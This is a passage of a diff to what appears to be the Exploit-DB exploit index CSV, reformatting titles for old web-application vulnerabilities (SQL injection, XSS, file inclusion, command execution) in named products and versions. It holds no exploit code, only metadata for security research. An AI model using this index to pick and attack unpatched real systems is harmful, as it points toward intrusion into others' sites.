Garcia-Hierro",php,webapps,0 22812,platforms/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 22818,platforms/php/webapps/22818.txt,"Tutos 1.1 - File_Select.php Cross-Site Scripting",2003-06-20,"François SORIN",php,webapps,0 22819,platforms/php/webapps/22819.txt,"Tutos 1.1 - File_New Arbitrary File Upload",2003-06-20,"François SORIN",php,webapps,0 -22820,platforms/php/webapps/22820.txt,"XMB Forum 1.8 - member.php member Parameter Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps,0 -22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 - buddy.php action Parameter Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps,0 +22820,platforms/php/webapps/22820.txt,"XMB Forum 1.8 - 'member.php?member' Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps,0 +22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 - 'buddy.php?action' Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps,0 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0 22828,platforms/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",php,webapps,0 22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 - 'iXmail_NetAttach.php' File Deletion",2003-06-26,leseulfrog,php,webapps,0 @@ -27083,7 +27084,7 @@ id,file,description,date,author,platform,type,port 22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps,0 22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0 22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - Settings.inc.php Full Path Disclosure",2003-07-17,Bosen,php,webapps,0 -22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 +22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 - 'Subject' HTML Injection",2003-08-11,G00db0y,php,webapps,0 @@ -27095,12 +27096,12 @@ id,file,description,date,author,platform,type,port 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx' Parameter SQL Injection",2012-11-26,NoGe,php,webapps,0 +22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php?idx' SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 -22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site-Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 - register.php HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps,0 22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 - error.asp Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps,0 22995,platforms/php/webapps/22995.txt,"C-Cart 1.0 - Full Path Disclosure",2003-08-08,G00db0y,php,webapps,0 @@ -27117,8 +27118,8 @@ id,file,description,date,author,platform,type,port 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 -23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' Parameter SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem' Parameter SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 +23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php?menuitem' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 @@ -27135,7 +27136,7 @@ id,file,description,date,author,platform,type,port 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - 'Message' HTML Injection",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps,0 -23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - (Multiple Modules) SQL Injection",2003-09-03,noconflic,php,webapps,0 +23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x (Multiple Modules) - SQL Injection",2003-09-03,noconflic,php,webapps,0 23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps,0 23105,platforms/php/webapps/23105.txt,"MyBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0 23106,platforms/php/webapps/23106.txt,"SchoolCMS - Persistent Cross-Site Scripting",2012-12-03,VipVince,php,webapps,0 @@ -27150,8 +27151,8 @@ id,file,description,date,author,platform,type,port 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal",2012-12-04,Nin3,windows,webapps,0 23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps,0 23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 -23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 -23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 +23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - 'banners.php?bid' SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 +23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - 'emailarticle.php?id' SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - 'auth.inc.php' SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0 @@ -27164,8 +27165,8 @@ id,file,description,date,author,platform,type,port 23194,platforms/php/webapps/23194.txt,"Geeklog 1.3.x - Cross-Site Scripting",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 - MSG Cross-Site Scripting",2003-09-29,G00db0y,asp,webapps,0 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 -23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 - advertiser.php Password Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 -23206,platforms/php/webapps/23206.txt,"DCP-Portal 5.5 - lostpassword.php email Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 +23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 - 'advertiser.php?Password' SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 +23206,platforms/php/webapps/23206.txt,"DCP-Portal 5.5 - 'lostpassword.php?email' SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23207,platforms/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 - search Cross-Site Scripting",2003-10-01,Ezhilan,php,webapps,0 23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal Information Disclosure",2003-10-01,"Gama Sec",php,webapps,0 23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 @@ -27262,7 +27263,7 @@ id,file,description,date,author,platform,type,port 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 -23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - (Multiple Modules) SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 +23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x (Multiple Modules) - SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 @@ -27285,20 +27286,20 @@ id,file,description,date,author,platform,type,port 23515,platforms/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps,0 23517,platforms/php/webapps/23517.txt,"HotNews 0.x - 'hotnews-engine.inc.php3' config[header] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 -23518,platforms/php/webapps/23518.txt,"HotNews 0.x - 'config[incdir]' Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 +23518,platforms/php/webapps/23518.txt,"HotNews 0.x - 'config[incdir]' Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps,0 -23520,platforms/php/webapps/23520.txt,"PHPGedView 2.61 - Multiple PHP Remote File Inclusion",2004-01-06,Windak,php,webapps,0 +23520,platforms/php/webapps/23520.txt,"PHPGedView 2.61 - Multiple Remote File Inclusions",2004-01-06,Windak,php,webapps,0 23691,platforms/php/webapps/23691.txt,"vBulletin 3.0 - search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 -23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting",2004-01-16,JeiAr,php,webapps,0 +23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,php,webapps,0 23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - Adminlogin.asp SQL Injection",2004-01-16,posidron,asp,webapps,0 -23548,platforms/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter SQL Injection",2004-01-16,JeiAr,cgi,webapps,0 +23548,platforms/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple SQL Injections",2004-01-16,JeiAr,cgi,webapps,0 23549,platforms/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps,0 -23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0 +23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,cgi,webapps,0 23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - userchannel.pl op Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0 23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0 23554,platforms/php/webapps/23554.java,"YABB SE 1.x - SSI.php ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0 @@ -27321,12 +27322,12 @@ id,file,description,date,author,platform,type,port 23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id' Parameter SQL Injection",2012-12-24,Red_Hat,php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php?id' SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps,0 23688,platforms/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 -23636,platforms/php/webapps/23636.txt,"Qualiteam X-Cart 3.x - general.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 -23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 +23636,platforms/php/webapps/23636.txt,"Qualiteam X-Cart 3.x - 'general.php?perl_binary' Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 +23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - 'upgrade.php?perl_binary' Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - 'Export.php' File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0 23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 @@ -27351,16 +27352,16 @@ id,file,description,date,author,platform,type,port 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0 -23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - advSearch_h.asp Multiple Parameter SQL Injection",2004-02-16,"Nick Gudov",asp,webapps,0 -23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - Custva.asp redirectUrl Parameter Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0 +23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - 'advSearch_h.asp' Multiple SQL Injections",2004-02-16,"Nick Gudov",asp,webapps,0 +23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - 'Custva.asp?redirectUrl' Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0 23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - Quote Parameter SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 -23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 +23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php?id' SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 23712,platforms/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 -23718,platforms/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - shop.php cat Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 -23719,platforms/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - shop_by_brand.php cat_manufacturer Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 -23720,platforms/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - listing.php id Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 +23718,platforms/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop.php?cat' SQL Injection",2004-02-18,G00db0y,php,webapps,0 +23719,platforms/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop_by_brand.php?cat_manufacturer' SQL Injection",2004-02-18,G00db0y,php,webapps,0 +23720,platforms/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - 'listing.php?id' SQL Injection",2004-02-18,G00db0y,php,webapps,0 23722,platforms/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - multiplechoice/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - glossary.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23724,platforms/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 - 'newmultiplechoice.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 @@ -27370,24 +27371,24 @@ id,file,description,date,author,platform,type,port 23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 - error.asp Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 - functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 23744,platforms/php/webapps/23744.txt,"EZBoard 7.3 - Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps,0 -23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 - u2uadmin.php uid Parameter Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 -23746,platforms/php/webapps/23746.txt,"XMB Forum 1.8 - editprofile.php user Parameter Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 +23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 - 'u2uadmin.php?uid' Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 +23746,platforms/php/webapps/23746.txt,"XMB Forum 1.8 - 'editprofile.php?user' Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 -23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 +23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - 'forumdisplay.php' Multiple SQL Injections",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 23770,platforms/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection",2004-03-01,"David Sopas Ferreira",php,webapps,0 23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps,0 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 -23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 +23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple SQL Injections",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 -23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 +23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0 -24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0 +24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - 'blocker_query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 -23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 +23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x (Multiple Modules) - Cross-Site Scripting",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 - Pop Parameter Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 23797,platforms/php/webapps/23797.txt,"Confixx 2 - DB Parameter SQL Injection",2004-03-09,wkr,php,webapps,0 23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,php,webapps,0 @@ -27395,20 +27396,20 @@ id,file,description,date,author,platform,type,port 23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0 23809,platforms/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 - nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps,0 -23810,platforms/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 - emumail.fcgi Multiple Parameter Cross-Site Scripting",2004-03-12,dr_insane,cgi,webapps,0 +23810,platforms/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 - 'emumail.fcgi' Multiple Cross-Site Scripting Vulnerabilities",2004-03-12,dr_insane,cgi,webapps,0 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps,0 23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - fname Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 -23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php basepath' Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 -23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 -23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - nmimage.php z Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 +23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php?basepath' Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 +23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - 'modules.php?gid' SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 +23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - 'nmimage.php?z' Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23819,platforms/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site 